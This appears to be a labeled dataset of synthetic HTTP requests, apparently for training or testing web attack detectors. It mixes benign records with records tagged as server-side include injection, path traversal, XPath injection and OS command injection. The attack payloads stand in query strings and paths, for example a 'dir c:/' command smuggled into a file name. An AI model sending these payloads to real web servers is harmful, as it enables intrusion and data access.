X-Forwarded-For: 55.241.109.189
X-Serial-Number: 103102
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23049
Start - Id: 30653
class: Valid
GET /qotes86OttM1@x/@fzTUx7RePU/ZVZYbetweenvar-g/e3tueqseoo38Litwetcf/X_57shutdown5CDKDiFO/lmzDgQ.pKqIY2NwJ5L/rxndV-7YCTjjFy/hVwe/qpoUaw4i/ei.gif?iee=461088&oCBBl4E=hgufas&atTemio=6866892&Ehohrcdgleh=A&msic7acpaT1=55181&cxxwgrmMMRftpA=ihcuto78tnmr&sr=i8aebF&epurtp25=9609&t4iiviaahejov=t+document9&i6udayel7ixhun=6974985 HTTP/1.1
Host: 160.92.161.40
Connection: keep-alive
Accept: audio/basic;q=0.1, video/*
Accept-Charset: iso-8859-1;q=0.7, windows-1257, windows-1257;q=0.7, hz-gb-2312;q=0.7
Accept-Encoding: *
Accept-Language: i1lmh-seyye
Cache-Control: axnutu='r4'
Client-ip: 208.242.86.47
Cookie: dickhsex2epa=v.Ow;onsajr9dtebtt=776718;rp5tkenluc=sAPT;Iwkarm2=aEGk
Cookie2: $Version="3"
Date: Sun, 18 Mar 07 20:39:38 GMT
ETag: W/"OEMvjLzec6uwHCPbV_"
Expect: fi1alor=b4fh
From: z0aSh0w@ysue.uk
If-Modified-Since: Sat, 05 Apr 08 02:11:44 CET
If-Unmodified-Since: Sun, 08 Nov 09 22:40:13 GMT
If-Match: "P@0M@vSS2ftLcKGO5AF"
If-None-Match: *
If-Range: Fri, 27 Apr 07 13:04:56 UTC
Max-Forwards: 065
MIME-Version: 8.0
Pragma: s=hiBhaq
Proxy-Authorization: dsoan 0sitr=Hnaoh
Authorization: 41Srw0 9ewK=3r14p7
Range: 0-,163-,68-6
Referer: http://o7mm2s3d.biz/ldseto/wpmsvl2a/4enns/Lm3N.dll
TE: chunked;q=0.0,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: hiJH7LVF http://www.scsuq2.com
UA-CPU: MIPS
UA-Disp: 251,682,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: gzip
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 047 www.Vcie.gif:267 "ksqsddinwgeeW" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 472936518137
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30653
Start - Id: 39406
class: SSI
GET /oe8GeciRIlarngrp/halstrE5zsmEeramof.tiff?1BalHsn=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&5P57zHvfh=dglev4y&ieukTm=s&5ibMPo8ce=810388448 HTTP/1.1
Host: www.hnBonsau.net
Connection: close
Accept: application/zip;q=0.1, audio/*, video/quicktime
Accept-Charset: *
Accept-Encoding: identity;q=0.8, gzip;q=0.9, gzip, gzip
Accept-Language: *;q=0.6
Cache-Control: no-cache
Cookie: rTlaej38esreowC=klD;i3OrragooS1tatI=eg;Nhnni=et6arDe3eoNeyEyha;yEs3s4AttsYo2=834509993;snuciau=utbqidN
Cookie2: $Version="22"
Date: Sat, 10 Mar 07 02:39:05 GMT
ETag: "IbnKc4-D37dlywxLI"
Expect: 100-continue
If-Modified-Since: Wed, 04 Feb 09 23:59:05 CET
If-Unmodified-Since: Sat, 17 Jul 04 23:58:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6040
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM cmVIZXluZm5vaXJ0ZWVtcDFoMXdudjJpbHd5Ym1pdHQ=
Authorization: NTLM d3NsdHVuZGwzcmdpN213blR0aXR0aTRkbnNhbGoxOGZrbHd3Sg==
Range: 747370-38132,5734-
Referer: http://ls3uLa.st/emewly4y/aice/miu4t/g2nibdi/hpbne4E.jsp
TE: trailers,trailers,chunked;q=0.6
Trailer: Via
User-Agent: siodh1atbiAtio
UA-CPU: StrongARM
Via: FTP/5.8 www.btteco.gif, 8.6 74.56.56.252, 8.1 www.q25hh.gif
Transfer-Encoding: eeEnce
X-Serial-Number: 3653526354532
----: ---------------------------------

null

End - Id: 39406
Start - Id: 6763
class: Valid
PUT /hrsxoxas4Nnwlun0/ntihrNdso5rastim6p/ctIisonboln/deletelyOrCKk/kwnAsw1tstSi/rsuxieevwhesincejs/o8WUB/sgrenrs.jpg? HTTP/1.1
Content-Length: 120
Content-Language: r,r2yret3o,p7in
Content-Encoding: compress
Content-Location: http://btKsK.net/r1ihi.pl
Content-MD5: c2VzeWFHa2RKaXJvaW1hcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Jul 09 10:02:56 CET
Last-Modified: Mon, 05 Oct 09 01:55:03 CET
Host: 214.138.208.133:80
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: pon-neaqrTao;q=0.6, nneizae-m;q=0.9, 0SrExh-i0ngP;q=0.2, ebseE2-uugt;q=0.7
Cache-Control: m1aer='fnxe'
Client-ip: 166.208.84.151
Cookie: h55uu=tore9e$tt;2cGjV=rlea;f5attD=88512;adoetn=tZ2;UhpZEma04winntO=$IaEattkhiat$thn
Cookie2: $Version="11"
Date: Wed, 18 Nov 09 12:45:26 UTC
ETag: W/"2OHyIFx6vyE_y4Nr"
Expect: i6mmpys3
From: i6Nyv@5oumwccEOt.be
If-Modified-Since: Sat, 07 Feb 09 12:17:35 CET
If-Unmodified-Since: Sun, 08 Mar 09 18:52:11 CET
If-Match: "NIyloQfJKMkCOd3PLAp2"
If-None-Match: "dyjco0bQxFe2uMpe@ee"
If-Range: Fri, 14 Dec 07 06:46:44 GMT
Max-Forwards: 5984
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic cnRyaDpudG5yZHdv
Authorization: NTLM aG9pZW1odHhpcnI0dXNFMXRsbWR0bm12MXRibnVha21jb3Ny
Range: 56346-5
Referer: /tndA/o1SP/snwmona/aTietn9p/Onuabag.swf
TE: chunked,trailers
Trailer: Accept
User-Agent: 2lp6a (dTXOaxVWDh; hFpVefTq)
UA-CPU: StrongARM
UA-Disp: 342,103,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3268x616
Via: HTTP/5.7 152.250.8.243:75808, HTTP/5.0 144.214.136.125, 1.2 61.114.194.174
Transfer-Encoding: gzip
Upgrade: rie/7.4, 5Iena/2.4, fuca/0.7
Warning: 686 27.211.29.45 "sijrpot" "Sat, 10 Jun 06 10:21:01 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 830725
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

cinnunssopTfyu=497&heelsirgahtadh=inisa&vQiWvf22xa=itn&yiieleiofnnrg=496524&tOts2yb=scripth1e&AIsesrl3i=qt<j mailuthif

End - Id: 6763
Start - Id: 32639
class: Valid
POST /nmTpscM/aPDZrT7zmUsUik/a9/eye.OH/B-c1dRdcmddn37vJnph-.shtml? HTTP/1.1
Content-Length: 36
Content-Language: fWShiehi,yW
Content-Encoding: identity
Content-Location: /emeObb.asp
Content-MD5: a3N0bmplYWd1cGVsaGhvdg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Sep 09 04:12:26 UTC
Last-Modified: Tue, 24 Jan 06 12:08:58 CET
Host: 225.170.88.210:00
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii, utf-7, shift_jis, windows-1255
Accept-Encoding: deflate, gzip, gzip
Accept-Language: aebadtn-ber83;q=0.9, 1-lusghn;q=0.6, hkooeAad-fkwiina, tFojm-mib
Cache-Control: only-if-cached
Client-ip: 213.140.106.223
Cookie: 0Ym3SAyOK=57219326;dana=886;dtb8ydr9qp=$naotehewc<ieraoGede;bfsa8nte6eEtr=suhw
Cookie2: $Version="17"
Date: Fri, 29 Dec 06 15:09:03 GMT
ETag: "z0A-1qYNtuBVTkH86MV7"
Expect: i6bhrc=ezzo
From: ueoto@th0yt1ahea.uk
If-Modified-Since: Tue, 10 Mar 09 01:20:30 CET
If-Unmodified-Since: Thu, 24 Jan 08 03:59:01 GMT
If-Match: "7h5KAshypDD5_vJ24"
If-None-Match: "M7Gj8DToYDfHGfrJP_"
If-Range: *
Max-Forwards: 53
MIME-Version: 8.6
Pragma: 8=4o0eocra
Proxy-Authorization: 0o5ihf yo2hT=8isrh
Authorization: NTLM ZG9zWW9ldmFJb3NndGRNdDkyaEVydGVvZWRwYWRobnBjaA==
Range: -8365,-00217
Referer: /ieoaba/sailxIwd/wyaHotts/jrhaiu/1osusw37.bin
TE: deflate
Trailer: Cache-Control
User-Agent: mmnta2
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: tRO/7.2 4.94.75.9, o1eun/8.0 www.ederbnR.jpg:000
Transfer-Encoding: gzip
Upgrade: ynt1h/8.2, ngs7ii/4.5, emia/0.6, hboy/6.2
Warning: 166 182.140.231.49 "qo7ntkcIsaeidh7" "Thu, 17 Feb 05 17:04:23 CET"
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 14198779071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

tamtdr='ue'n&leznraodpii5e=t_VG6

End - Id: 32639
Start - Id: 20516
class: Valid
GET /K.passthru7/yIs/s5lSqhZjE/5hunb-7I013lm1vHo/uko0aelKMbvvsD3OJH/bodySN.kfandP8yXV4scriptopt/ohdo.htm?cOslrnoxt6rse=Ita%3E&shewupbicmdanaL=bt&rt6i5s1u=3126&hesaoeyadh=aUSjCxo1&gs6mtch=7rsiueilcne7A&kninlnDgeeoend=nieeeo%3E7s0+&ld1arws=e9+sett&mAtrhe83dob=a8&L.n_nJxbs=rrNnirer+lweas&sre=aui9F&vtdp0eetmom=b_iewhbX HTTP/1.0
Host: 76.129.247.24
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.4, gzip;q=0.9, identity;q=0.5, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 84.84.100.25
Cookie: EBdrRliriw6fab=aetycoDmno;vwiee=hrmar;ce8niusp=23312764;lEieidaate5oe3S=9r8-8qDNKVfx;8r=329889;ci1wemHrAdi=2610367930
Cookie2: $Version="24"
Date: Tue, 01 Jan 08 20:30:07 UTC
ETag: "6S8bQj.V8fdx.K6"
Expect: 100-continue
From: ttui@snpa.it
If-Modified-Since: Tue, 11 Jul 06 03:05:37 UTC
If-Unmodified-Since: Sat, 08 Aug 09 20:21:08 UTC
If-Match: *
If-None-Match: "hxXm-0JNoxhAUt7"
If-Range: "AKuWP9KlwYj..yhN"
Max-Forwards: 8
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic dGx0MHJzZTpybnN1
Authorization: Basic b2lhbzphc2lvOQ==
Range: -6,89-60
Referer: http://disz2ht.de/tu6ap/5lipCno.sh
TE: trailers
Trailer: Connection
User-Agent: eAla/4.5
UA-CPU: StrongARM
UA-Disp: 027,9138,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5447x066
Via: 2.1 191.177.151.23, 4.4 21.39.193.242
Transfer-Encoding: compress
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 358 31.230.86.11 "lxeoteiukr" "Sun, 20 Feb 05 06:39:18 GMT"
X-Forwarded-For: 55.186.171.144
X-Serial-Number: 48113953855
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20516
Start - Id: 3742
class: Valid
GET /rrBGGZbN-AufnXdZ/itj/g1x5ro/eQR/2SFxq/srtoucootuD32nnvae/MdrEZ/lqcnerymiaIea9/a18ln-4bz5MZeA-k/rfU0Rqbo1jdoE_WXx4q/oaqareedeRRdH.cgi?ohIoaIn050Dszte=3&atRy81o=Ogidefueoiu&5h0o822u=1adutet6frochtc HTTP/1.0
Host: www.tiasbitc.be
Connection: keep-alive
Accept: video/quicktime;q=0.7
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: g=Ibtcsc
Client-ip: 84.161.93.71
Cookie: @GNr=wu0e1kF;oewMoDoeBc=sf;nsiobOoesa2m;higdi=0990067847
Cookie2: $Version="4"
Date: Tue, 04 May 04 07:40:40 GMT
ETag: "DpQ2QGZeTckP37x"
Expect: 100-continue
From: taoiWora@eNkAhr.st
If-Modified-Since: Tue, 15 Dec 09 20:46:05 CET
If-Unmodified-Since: Wed, 24 Jun 09 10:07:59 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Jun 07 08:40:05 CET
Max-Forwards: 34
MIME-Version: 2.2
Pragma: apoADsdN=mrge
Proxy-Authorization: 8ei8 find2nv=sauahwqA
Authorization: NTLM cm5zOGViYXN0YXQxb29OdHNzMGV0YW5zdGRyQmd0cmVwdm51bGRGZQ==
Range: 004039-137516,-79
Referer: http://www.sgui.be/Bhii.cfm
TE: deflate,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/8.4 (X11; U; Linux i586 6.2; xr-5t; rv:6.1.1) Gecko/09032761
UA-CPU: StrongARM
UA-Disp: 7385,2023,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0475x7705
Via: FTP/3.2 236.118.230.217
Transfer-Encoding: gzip
Upgrade: 3ett/0.9, amuefb/1.7, rjo/0.3, ent6/8.0, 6Liroa/6.9
Warning: 836 116.134.212.111 "a0znr0igtS" "Fri, 24 Sep 04 03:35:09 GMT"
X-Forwarded-For: 157.35.246.27
X-Serial-Number: 68867877
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3742
Start - Id: 4206
class: Valid
POST /thsohrl8i/t3NFW@aPE5c/shMP8.qog8/lisnciNixesfxfeimHsa/6rzebediiezufr/G09K/3TMom.GeqLQ0VC86/eqtovr0in3.asmx? HTTP/1.1
Content-Length: 12
Content-Language: lTertar0,uCZ1TstN
Content-Encoding: compress
Content-Location: http://www.zalae.fr/3xdto/ox6gel.asp
Content-MD5: aWVnZXRvaHU3dWFVZW9lZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 24:15:52 GMT
Last-Modified: Fri, 07 Jul 06 07:51:22 UTC
Host: www.ybrIehsaoe.com
Connection: close
Accept: image/gif;q=0.0
Accept-Charset: x-mac-icelandic, iso-2022-kr;q=0.9
Accept-Encoding: *
Accept-Language: elxgni-z5hinh;q=0.5, penM-9s, lhabwol-Iutup;q=0.2, sdnrbii-g
Cache-Control: min-fresh=09
Client-ip: 139.195.254.48
Cookie: aa7nsnmsap=iojyhnrmrvitu ;BCKOidD=scriptt0;vin=oNidsmi5cHahFns;koheasietlCo=oWn;3eTe=615;jFIbin6hqll-=605
Cookie2: $Version="26"
Date: Sun, 23 May 04 23:43:44 CET
ETag: "5MHFYdaoQ55t.vCLV"
Expect: 100-continue
From: tewe@gFoteninnd.com
If-Modified-Since: Mon, 09 Mar 09 24:44:42 GMT
If-Unmodified-Since: Thu, 17 Mar 05 13:07:17 CET
If-Match: "L4uTyYWouIyyaUVg"
If-None-Match: "t_ddFPbJRM3rggV"
If-Range: Wed, 04 Mar 09 23:37:25 CET
Max-Forwards: 9871
MIME-Version: 3.1
Pragma: sreon6=sfennfc
Proxy-Authorization: Digest cnonce="ys6ahg"
Authorization: Digest qop=auth-int
Range: 2-,878-,561480-5
Referer: /cydnkai/kge7.tar.gz
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/3.4 (Windows; U; Windows NT 7.1; ex-re; rv:2.9.9) Gecko/14302735
UA-CPU: x86
UA-Disp: 505,4605,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 820x313
Via: 0.7 242.41.23.214
Transfer-Encoding: identity
Upgrade: hoPa/4.4, Rhih/0.5
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 1489164052019432947
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

geaheeBRn=pc

End - Id: 4206
Start - Id: 1908
class: Valid
GET /d5QYx-cXHj5vA/ohzIfyUGAVDY50el1E/3kahmR/a2CCPlV-/LaruavedsE/xgeHcPvZltyFJXA/e2ifV/tapreX/IW1XtBYCwindow.openjksMVS/qlneejt/ia.gif?uoeesnto=aipnas1tr3a7&cjn=meta+r4&ooNdqsadn=xYUWb&0heHaraeuttyid=4&dIbnl=628&a7miSnacntagi=1436557&bak2ehosEnnrne=sE&O6wBBeR=Rx9ser HTTP/1.0
Host: www.naer.biz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7;q=0.4, x-mac-turkish;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 201.189.225.98
Cookie: eaac3sp=iM5Klisgnvjc;ih9hc=81715630;t8ttNo=46;5dlodvfAeefo=a5includeconnecteed3eaos;snb=fl8 ;aw7siMzdropMk=soNu
Cookie2: $Version="83"
Date: Tue, 24 May 05 11:12:51 UTC
ETag: "5akjY@04y3w7qYSzEYDR"
Expect: neSrn4=ecsarcdw
From: shmniet@tebt.net
If-Modified-Since: Sat, 17 Jan 04 02:19:35 GMT
If-Unmodified-Since: Sun, 18 Feb 07 13:31:16 UTC
If-Match: "oYwT2Ue@@ivR4g0"
If-None-Match: *
If-Range: *
Max-Forwards: 166
MIME-Version: 3.7
Pragma: c='eosqiree'
Proxy-Authorization: wrea ltni=8Rsiyra
Authorization: NTLM YXVoQW9yY2pjNk40dXdlbnNpYWhuZ2xyeW4waWN0clRvNnBhZXh0bmR4UmY=
Range: 730007-,8569-0684
Referer: /Atyaur.mpg
TE: trailers
Trailer: Expect
User-Agent: eeOy69d0/4.0.4
UA-CPU: PowerPC
UA-Disp: 272,378,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 594x6031
Via: HTTP/5.2 159.128.86.175, 0.2 41.3.189.240:6049
Transfer-Encoding: identity
Upgrade: cUoNn/3.2
Warning: 924 www.bbtn.js "trtrnasnAn" 
X-Forwarded-For: 136.63.127.58
X-Serial-Number: 1247280154947
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1908
Start - Id: 40900
class: SSI
GET /Sf@g/Qo0d3H/botNmia/ldnh/c8cfwLl0ibIAugneCPc/arL25/lW0-cnx0KFli0EJs/nees4op/l73M/v7cecsIxmnebimct/9taPn1mnNese.js?0@iyKpasswdqQ=A6&DEabe.nTj=agecvFff&tlari8riIjd81tq=y0A3&t25etAni2t4=%3C%21--++%23odbc+++connect%3D%22anudVt%2Cn4ri3a%2Cssr%22+++++++statement%3D%22select+++++*++from++++A2Tl%22--%3E&lhws4=M&Sn=n3sMiy&robieehArodrtIi=18786&haSer=th8oats HTTP/1.0
Host: 48.29.230.130
Connection: close
Accept: text/plain, text/html, application/*
Accept-Charset: macintosh, iso-8859-3, iso-8859-15, iso-2022-jp, iso-2022-kr
Accept-Encoding: 
Accept-Language: bmlp-eeil, 8eau-mewabe;q=0.7, v-irrdeil;q=0.3, ssui-iewusnid
Cache-Control: only-if-cached
Client-ip: 215.13.110.135
Cookie: X8Qqu94=aitVou4Lum;esttehsee=uhpmobhmtacnph-;FriyviAe6lr=di.au
Cookie2: $Version="8"
Date: Thu, 10 Nov 05 02:52:49 CET
ETag: W/"Hbi9FlqOqi2IBOOJ0"
Expect: 100-continue
From: ditrnsd@mzoyfsuain.uk
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Tue, 25 Jan 05 12:54:31 UTC
If-Match: "JFFjtQ3dMZUbi3yyi"
If-None-Match: "ykHuXX8DJTE3gjWQNx"
If-Range: Sun, 02 Sep 07 11:22:26 GMT
Max-Forwards: 3
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM b3Bpc295VHpvc2syNGxlZkV3aGlhbmVuZTVlYmh0b3RzenI=
Authorization: NTLM Y25saXFjZW5paXZvZmRqeXlmYmhkb2lheEE2aWR5YTdlZTFyc3NSb1RvZTZh
Range: 776-,-33080
Referer: http://v1drh8c.ch/fthEi/nwssp.asp
TE: gzip,trailers,trailers
Trailer: Expect
User-Agent: sVlbkArPR http://www.tymoa.de
UA-CPU: StrongARM
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 206x873
Via: HTTP/6.6 100.7.237.22:880
Transfer-Encoding: identity
Upgrade: fmoaA/7.1, wyse3a/5.5, tlee/2.8, eejrdw/0.2
Warning: 603 www.e2tt.jpg:323 "reecdaeesselriRoe" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 821981271525659
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40900
Start - Id: 45031
class: PathTransversal
PUT /vpLC.2YopWwAc/Lb1Ksljigin/HwAbetweeny/yor2ntei78teatma5p1s.cgi? HTTP/1.1
Content-Length: 64
Content-Language: ltNZ83e,d
Content-Encoding: identity
Content-Location: /rsua/wnscrs/u9sl/ensfsas/4o9q.php
Content-MD5: c2JuVjZ0dW5sYXNhVGFvSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Jan 09 08:43:39 UTC
Last-Modified: Wed, 31 Oct 07 07:14:48 GMT
Host: www.agtesShql.com
Connection: hnnn
Accept: text/*;q=0.8
Accept-Charset: iso-8859-5, cp-936;q=0.9, x-mac-turkish;q=0.8, euc-cn;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 100.128.177.239
Cookie: edpE=095;OjeabWcn3ei=e1nNaotrlwr;ircofet=2621687;zse3eee=file:///s:/asga/rEif/d3tVh.xml;Tb2VU7=r;gsouonlFemgs=andTTt6-NrL
Cookie2: $Version="67"
Date: Sat, 11 Sep 04 20:38:04 CET
ETag: W/"TZED-z50e2nlMJXN"
Expect: 100-continue
From: uibs@mqphyitrx.ch
If-Modified-Since: Mon, 01 Aug 05 06:25:41 CET
If-Match: *
If-None-Match: "3kS2UML@8yORPlnsEOR"
If-Range: "Xr812i1gEib_hGL"
Max-Forwards: 7
MIME-Version: 7.0
Pragma: no-cache
Authorization: zedi egoe=eoass
Range: 0850-47613,090-82,-0
Referer: /hTte9.php4
TE: trailers
User-Agent: Mozilla/0.5 (compatible; onurt; Open BSD i386; Tihint9)
UA-CPU: Sparc
UA-Pixels: 827x9248
Via: HTTP/9.9 www.aoeeaslY.jpeg:75818, FTP/9.7 87.84.86.5
Transfer-Encoding: compress
Upgrade: c0roei/9.5, tii/1.6
Warning: 356 183.89.97.198 "1std" "Sun, 18 Jul 04 06:45:57 GMT"
X-Forwarded-For: 206.19.206.22
X-Serial-Number: 8285555437517823
----: -------------------------

si=092&peg50nRw=aMosunel\earush &tXt6ni=010&aneueaitjooh=09eae

End - Id: 45031
Start - Id: 30715
class: Valid
GET /teenhnch/ffgW6hJCa/gteBryt/Y3HPSwL9kNBscript.gif?L6zjQhtacces=n5et49s&i8seeNsrwile=0&mlmoq0str=+L%7C&dNpsirntbSdoUss=nIFvhTsV-_Y&hO4h0dcoB=%27%25uetdzBnei&OlocnSxlcLejO=eCdq_Cfm6&waoii5hoirefr=hnuh&2btnoraale4iit6=6&aasdgisdt0a=35579802&f8thenijo2i=4351064834&ntialfaem=istmptto%40ne7s&wopenhavingTG9MuX=scriptEwiastiiAdke&oerecxleocrx=l6ise&srifthQostpylos=cqRIGtk%40p HTTP/1.0
Host: 210.54.194.14
Connection: close
Accept: image/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, gzip;q=0.4, compress;q=0.2
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 204.5.251.170
Cookie: 4s7etyg=DLaes jSin; aa:Per;rhe1EguinqOT=LtatI;T3shutdownCE=vbscriptotojlphphtaccesbYqCdd3l letc;ufeoA=048;oeTsOo=s12JN;Iaoriug=81Wsrr566n
Cookie2: $Version="1"
Date: Tue, 05 Jun 07 24:06:16 CET
ETag: W/"OxHnriD0suMXtmOn"
Expect: 100-continue
From: dubt@tmrdi.net
If-Modified-Since: Wed, 09 Jul 08 21:23:38 GMT
If-Unmodified-Since: Sat, 26 Jan 08 17:49:09 GMT
If-Match: *
If-None-Match: "8SdTYxe2kQhKYB7.dMQq"
If-Range: Mon, 14 Dec 09 21:36:32 GMT
Max-Forwards: 60
MIME-Version: 7.4
Pragma: murwnch=hyeae
Proxy-Authorization: NTLM b2pjcm5taHNpZXNlZTM2aXRzaGlubG9Obm9lMG5laGdvdGlu
Authorization: Basic TmV0ZWVTc046ZGloc2F0
Range: 17470-
Referer: http://hdts.gov/unaaN0p/sQiva.jsp
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/6.5 (Machintosh; U; PPC 0.9; he-xe; rv:4.9.0) Gecko/82762195
UA-CPU: MIPS
UA-Disp: 802,001,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2445x5903
Via: FTP/3.1 246.138.91.30
Transfer-Encoding: compress
Upgrade: Fit/6.5, aensa/6.6
Warning: 028 44.212.149.214:667 "lxogstinibrueodc" "Fri, 09 Apr 04 15:35:57 CET"
X-Forwarded-For: 78.5.245.10
X-Serial-Number: 925559378
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30715
Start - Id: 49810
class: XPathInjection
GET /@SZcX1orDkCrSRinsert/wyWRQpFPFYzv/ouflai3IeVoyotio.js?IN9VGvtelnet=4+or+++dta%2F5r%2F3e%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D369%5D++or++83%3D&fs=t%29%25uA5qnd%3Cftu0eln&LB6v_-rexecHFPE=titeutaTrlatbo&tYi7r=T%28orp&snctv7S=54355&yeh8elecypt0oHe=e3ovMlgObQ&8twr=1foec-i&88nlechohc=hlalea&ctir3uer9u=coW&jnns=txd HTTP/1.1
Host: www.besTOqsf.uk
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.6, windows-1252;q=0.7, x-mac-ce;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: oeta-ttr1yn3c, hom5-rse;q=0.0, PIscsMa-swT
Cache-Control: max-stale=27233
Client-ip: 248.234.57.173
Cookie: asTebtf4fuhLpe=sabeitYIhyd;Gnulli_N@sam=makTact8Tnl
Cookie2: $Version="7"
Date: Tue, 08 May 07 02:13:20 GMT
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: Eyi42tm7@6degzo.st
If-Modified-Since: Sat, 10 May 08 11:26:41 CET
If-Unmodified-Since: Wed, 14 Mar 07 21:11:01 UTC
If-Match: *
If-None-Match: *
If-Range: "dDg9YTbEPwlmqsZ."
Max-Forwards: 548
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: hbE9e eiza=ioIeete
Range: -786962,-08955,08-
Referer: /ir3t8v/hmma/3olub1.jsp
TE: trailers,chunked;q=0.9,trailers
Trailer: Accept-Encoding
User-Agent: eqsgOYEN http://www.M1rN.net
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 172x6984
Via: aeD/0.0 www.clysye.htm
Transfer-Encoding: identity
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 153.152.40.255
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49810
Start - Id: 44102
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: 76.44.176.153
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: min-fresh=98203
Client-ip: 236.2.174.53
Cookie: upr9nlhjo=101;s6=eCa%
Cookie2: $Version="7"
Date: Sat, 26 Mar 05 23:49:53 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Sat, 12 Dec 09 08:37:36 GMT
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
If-Range: *
Max-Forwards: 104
MIME-Version: 0.4
Pragma: cn=aLwhuimn
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: NTLM aGN6aTVpd3RycnFzdGJvaHN0MnVqc2xpZ25hYWVkZm9saw==
Range: 70-
Referer: http://www.RwubthAc.cz/n1in/ofundie/1Oenm/ocidmda/sRtms.zip
TE: chunked
Trailer: Date
User-Agent: minewy/9.4
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1501x189
Via: p3nw/6.4 239.198.77.138, FTP/4.4 www.adnaao.shtml, HTTP/0.8 210.137.141.112:893
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 194.144.61.158
X-Serial-Number: 388289600968011
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44102
Start - Id: 43018
class: OsCommanding
